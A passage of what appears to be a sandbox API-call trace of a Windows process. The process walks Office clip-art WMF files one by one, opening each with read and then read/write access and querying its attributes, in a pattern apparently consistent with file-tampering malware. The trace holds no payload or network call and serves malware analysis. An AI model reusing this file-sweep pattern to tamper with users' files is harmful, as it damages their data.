GetFileType (hFile=0x27c) returned 0x1 [0104.429] CloseHandle (hObject=0x27c) returned 1 [0104.429] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01193_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01193_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x488)) returned 1 [0104.429] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01196_.WMF", cAlternateFileName="")) returned 1 [0104.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.429] GetFileType (hFile=0x27c) returned 0x1 [0104.429] CloseHandle (hObject=0x27c) returned 1 [0104.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.430] GetFileType (hFile=0x27c) returned 0x1 [0104.430] CloseHandle (hObject=0x27c) returned 1 [0104.430] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01196_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01196_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91c)) returned 1 [0104.430] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x284c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01548_.WMF", cAlternateFileName="")) returned 1 [0104.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.514] GetFileType (hFile=0x27c) returned 0x1 [0104.514] CloseHandle (hObject=0x27c) returned 1 [0104.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.514] GetFileType (hFile=0x27c) returned 0x1 [0104.514] CloseHandle (hObject=0x27c) returned 1 [0104.514] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01548_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01548_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x284c)) returned 1 [0104.514] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76ce, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01657_.WMF", cAlternateFileName="")) returned 1 [0104.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.514] GetFileType (hFile=0x27c) returned 0x1 [0104.515] CloseHandle (hObject=0x27c) returned 1 [0104.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.515] GetFileType (hFile=0x27c) returned 0x1 [0104.515] CloseHandle (hObject=0x27c) returned 1 [0104.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf2a4e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76ce)) returned 1 [0104.515] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4604, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01658_.WMF", cAlternateFileName="")) returned 1 [0104.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.515] GetFileType (hFile=0x27c) returned 0x1 [0104.515] CloseHandle (hObject=0x27c) returned 1 [0104.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.516] GetFileType (hFile=0x27c) returned 0x1 [0104.516] CloseHandle (hObject=0x27c) returned 1 [0104.516] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01658_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01658_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4604)) returned 1 [0104.516] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79cc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01659_.WMF", cAlternateFileName="")) returned 1 [0104.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.517] GetFileType (hFile=0x27c) returned 0x1 [0104.517] CloseHandle (hObject=0x27c) returned 1 [0104.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.517] GetFileType (hFile=0x27c) returned 0x1 [0104.517] CloseHandle (hObject=0x27c) returned 1 [0104.517] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79cc)) returned 1 [0104.517] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x329e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD01660_.WMF", cAlternateFileName="")) returned 1 [0104.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.517] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.518] GetFileType (hFile=0x27c) returned 0x1 [0104.518] CloseHandle (hObject=0x27c) returned 1 [0104.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.518] GetFileType (hFile=0x27c) returned 0x1 [0104.518] CloseHandle (hObject=0x27c) returned 1 [0104.518] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x329e)) returned 1 [0104.518] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02068_.WMF", cAlternateFileName="")) returned 1 [0104.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.518] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.518] GetFileType (hFile=0x27c) returned 0x1 [0104.518] CloseHandle (hObject=0x27c) returned 1 [0104.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.519] GetFileType (hFile=0x27c) returned 0x1 [0104.519] CloseHandle (hObject=0x27c) returned 1 [0104.519] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8)) returned 1 [0104.519] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02071_.WMF", cAlternateFileName="")) returned 1 [0104.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.519] GetFileType (hFile=0x27c) returned 0x1 [0104.519] CloseHandle (hObject=0x27c) returned 1 [0104.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.519] GetFileType (hFile=0x27c) returned 0x1 [0104.520] CloseHandle (hObject=0x27c) returned 1 [0104.520] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88c)) returned 1 [0104.520] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02075_.WMF", cAlternateFileName="")) returned 1 [0104.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.520] GetFileType (hFile=0x27c) returned 0x1 [0104.520] CloseHandle (hObject=0x27c) returned 1 [0104.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.520] GetFileType (hFile=0x27c) returned 0x1 [0104.520] CloseHandle (hObject=0x27c) returned 1 [0104.520] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112c)) returned 1 [0104.521] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FD02088_.WMF", cAlternateFileName="")) returned 1 [0104.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF", lpUsedDefaultChar=0x0) returned 69 [0104.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.521] GetFileType (hFile=0x27c) returned 0x1 [0104.521] CloseHandle (hObject=0x27c) returned 1 [0104.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.522] GetFileType (hFile=0x27c) returned 0x1 [0104.522] CloseHandle (hObject=0x27c) returned 1 [0104.522] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02088_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02088_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf50660, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf50660, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf50660, 